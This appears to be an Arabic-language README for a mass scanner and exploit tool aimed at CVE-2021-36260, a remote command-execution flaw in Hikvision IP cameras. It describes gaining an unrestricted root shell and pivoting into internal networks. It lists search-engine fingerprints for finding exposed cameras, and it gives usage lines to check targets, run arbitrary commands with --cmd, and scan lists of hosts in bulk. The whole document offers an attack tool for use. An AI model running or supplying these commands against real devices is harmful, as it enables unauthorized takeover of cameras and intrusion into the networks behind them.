
أداة الكشف والاستغلال الجماعي لثغرات RCE في Hikvision
يمكن للمهاجم استخدام هذه الثغرة للتحكم الكامل في الجهاز عبر قشرة جذر (root shell) غير مقيدة، حتى لو كان مالك الجهاز مقيدًا بقشرة محمية محدودة (psh). بالإضافة إلى اختراق كاميرات IP، يمكن أيضًا الوصول إلى الشبكة الداخلية ومهاجمتها.
header="Hikvision"
app="HIKVISION-视频监控"
python ./CVE-2021-36260.py -u http://192.168.1.1:8080 --check
python ./CVE-2021-36260.py -u http://192.168.1.1:8080 --cmd "ls -la"
python ./CVE-2021-36260.py -f target.txt
optional arguments:
-h, --help show this help message and exit
-u URL, --url URL Start scanning url
-f FILE, --file FILE read the url from the file
--check Check if vulnerable
--cmd CMD execute cmd (i.e: "ls -l")
يمكن استخدامها للبحث الجماعي عن ثغرات SRC.